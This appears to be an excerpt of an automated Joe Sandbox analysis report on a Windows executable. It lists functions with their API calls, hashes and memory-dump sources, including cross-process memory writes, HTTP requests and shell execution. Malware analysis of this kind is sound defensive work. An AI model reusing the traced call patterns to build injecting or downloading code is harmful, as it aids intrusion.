                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                              • String ID:
                                                                                              • API String ID: 938513278-0
                                                                                              • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                                              • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                                                              • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                                              • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                                                              Function 00413D0E Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                                              • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                                                • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                              • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                                                • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                              • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                                              • ExitThread.KERNEL32 ref: 00413D4E
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                                              • __freefls@4.LIBCMT ref: 00413D74
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                              • String ID:
                                                                                              • API String ID: 2403457894-0
                                                                                              • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                                              • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                                                                                              • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                                              • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                                                                                              Function 004151AF Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                                              • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                                                • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                              • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                                                • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                              • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                                              • ExitThread.KERNEL32 ref: 004151ED
                                                                                              • __freefls@4.LIBCMT ref: 00415209
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                              • String ID:
                                                                                              • API String ID: 4247068974-0
                                                                                              • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                                              • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                                                              • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                                              • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                                                              Function 0044F405 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 302COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: )$U$\
                                                                                              • API String ID: 0-3705770531
                                                                                              • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                                              • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                                                              • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                                              • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                                                                              Function 0046E48D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                                              • CoInitialize.OLE32(00000000), ref: 0046E505
                                                                                              • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                                                              • CoUninitialize.OLE32 ref: 0046E53D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                              • String ID: .lnk
                                                                                              • API String ID: 886957087-24824748
                                                                                              • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                                              • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                                                              • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                                              • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                                                              Function 0044E180 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove
                                                                                              • String ID: \
                                                                                              • API String ID: 4104443479-2967466578
                                                                                              • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                                              • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                                                                                              • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                                              • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                                              Function 0044E189 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove
                                                                                              • String ID: \
                                                                                              • API String ID: 4104443479-2967466578
                                                                                              • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                                              • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                                                                                              • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                                              • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                                              Function 0044E199 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 260COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove
                                                                                              • String ID: \
                                                                                              • API String ID: 4104443479-2967466578
                                                                                              • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                                              • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                                                                                              • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                                              • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                                                                                              Function 0046A6E1 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 241COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                              • API String ID: 708495834-557222456
                                                                                              • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                                                              • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                                                              • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                                                              • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                                                              Function 0043659E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                                                                • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                                                                • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                                                                • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                                                                • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                                                              • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                              • String ID: @
                                                                                              • API String ID: 4150878124-2766056989
                                                                                              • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                                              • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                                                              • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                                              • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                                                                              Function 0044F137 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 161COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove
                                                                                              • String ID: \$]$h
                                                                                              • API String ID: 4104443479-3262404753
                                                                                              • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                                              • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                                                                              • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                                              • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                                                                              Function 00457C53 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 158COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                                                                • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                              • CloseHandle.KERNEL32(?), ref: 00457E09
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                                                              • String ID: <$@
                                                                                              • API String ID: 2417854910-1426351568
                                                                                              • Opcode ID: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                                                              • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                                                              • Opcode Fuzzy Hash: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                                                              • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                                                              Function 0044A856 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                                                                • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                                              • String ID:
                                                                                              • API String ID: 3705125965-3916222277
                                                                                              • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                                              • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                                                              • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                                              • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                                                                              Function 0045FA41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                                                              • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                                                              • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Delete$InfoItem
                                                                                              • String ID: 0
                                                                                              • API String ID: 135850232-4108050209
                                                                                              • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                                              • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                                                              • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                                              • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
